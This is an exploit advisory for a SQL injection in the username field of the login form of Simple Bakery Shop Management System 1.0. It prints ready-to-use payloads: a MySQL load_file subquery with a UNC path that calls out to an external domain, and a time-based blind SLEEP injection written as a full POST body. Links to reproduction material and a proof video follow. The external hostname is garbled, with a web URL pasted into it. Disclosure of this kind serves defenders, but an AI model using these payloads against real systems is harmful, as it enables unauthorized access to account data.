Simple Bakery Shop Management System 1.0 SQL Injection

`## Title: Simple Bakery Shop Management System v1.0 remote SQL-Injections  
## Author: nu11secur1ty  
## Date: 02.14.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html  
  
  
## Description:  
The username parameter from Simple Bakery Shop Management System v1.0  
appears to be vulnerable to SQL injection attacks.  
The payload '+(select  
load_file('\\\\uecbuk5uwc33xkpj8ty1fdix5obhz9n0qoib8zx.https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html\\zgr'))+'  
was submitted in the username parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed. The attacker can be retrieving all  
information about all  
accounts of this system. The malicious actor can use this information  
for malicious purposes!  
WARNING: If this is in some external domain, or some subdomain, or  
internal, this will be extremely dangerous!  
Status: CRITICAL  
  
  
[+] Payload:  
  
```mysql  
---  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=gqHxMzWA'+(select  
load_file('\\\\uecbuk5uwc33xkpj8ty1fdix5obhz9n0qoib8zx.https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html\\zgr'))+''  
AND (SELECT 4660 FROM (SELECT(SLEEP(3)))XYJd) AND  
'Irjn'='Irjn&password=y0C!l3w!Q5  
---  
  
```  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Simple-Bakery-Shop-Management)  
  
## Proof and Exploit:  
[href](https://streamable.com/9m854x)  
  
`